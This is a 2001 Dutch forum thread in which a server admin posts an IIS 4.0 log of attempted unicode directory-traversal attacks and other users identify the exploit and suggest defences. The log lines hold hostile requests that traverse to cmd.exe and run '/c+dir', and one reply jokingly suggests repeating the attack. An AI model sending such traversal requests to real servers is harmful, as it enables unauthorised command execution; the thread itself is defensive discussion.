Toon posts:

[BC3] Merkwaardige IIS4 log

Pagina: 1
Acties:

Verwijderd

Topicstarter
Ik bekeek net even mijn log van mijn IIS 4.0 server en las ik dat iemand iets geks probeerde te doen. Weet iemand wat hij probeerd te doen, en of het hem gelukt is :)
(IP adressen zijn weg gehaald)

--====Knip/Plak Logfile====--
code:
1
2
3
4
5
6
7
8
9
10
11
, -, 7-5-01, 17:58:06, W3SVC1, ZON,, 140, 66, 2015, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:06, W3SVC1, ZON,, 20, 66, 2015, 200, 0, GET, /scripts/..\../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:06, W3SVC1, ZON,, 30, 66, 2015, 200, 0, GET, /scripts/..\../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:06, W3SVC1, ZON,, 40, 66, 2015, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:06, W3SVC1, ZON,, 30, 66, 2015, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:08, W3SVC1, ZON,, 30, 66, 2015, 200, 0, GET, /scripts/..\../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:08, W3SVC1, ZON,, 0, 66, 0, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:08, W3SVC1, ZON,, 20, 66, 2015, 200, 0, GET, /scripts/..\../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:08, W3SVC1, ZON,, 20, 66, 634, 404, 3, GET, /scripts/..o../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:08, W3SVC1, ZON,, 30, 69, 2015, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
, -, 7-5-01, 17:58:10, W3SVC1, ZON,, 10, 72, 634, 404, 3, GET, /scripts/..ð??¯../winnt/system32/cmd.exe, /c+dir,

  • pierce
  • Registratie: April 2000
  • Laatst online: 07-05 21:04
Iemand heeft geprobeerd om via een fout in IIS 4 jou systeem te hacken!
Zie http://www.eeye.com/html/Research/Advisories/AD20001003.html voor meer info.

5564


  • McMiGHtY
  • Registratie: December 1999
  • Laatst online: 07-05 09:48

McMiGHtY

- burp -

Misschien verstandig om je cmd.exe en je command.exe te renamen in iets anders?

NEW - Het Grote - 2026 Tweakers Social Ride- Topic!


  • Rob
  • Registratie: Februari 2000
  • Niet online

Rob

Probeer het zelf eens wat hij geprobeerd heeft, dan weet je of het gelukt is :)

In the beginning the Internet was a bunch of smart users with dumb terminals. Now...


  • BC3 Victim
  • Registratie: Juli 2001
  • Laatst online: 29-09-2006
lijkt een beetje op mislukte unicode bug "hack" poging...

De username van de oorspronkelijke plaatser van deze posting is bij Big Crash 3 eind mei 2001 verloren gegaan. Om toch de posting zelf terug te kunnen plaatsen is de user BC3 Victim in het leven geroepen


Verwijderd

Topicstarter
Bedankt voor jullie hulp ...
Pagina: 1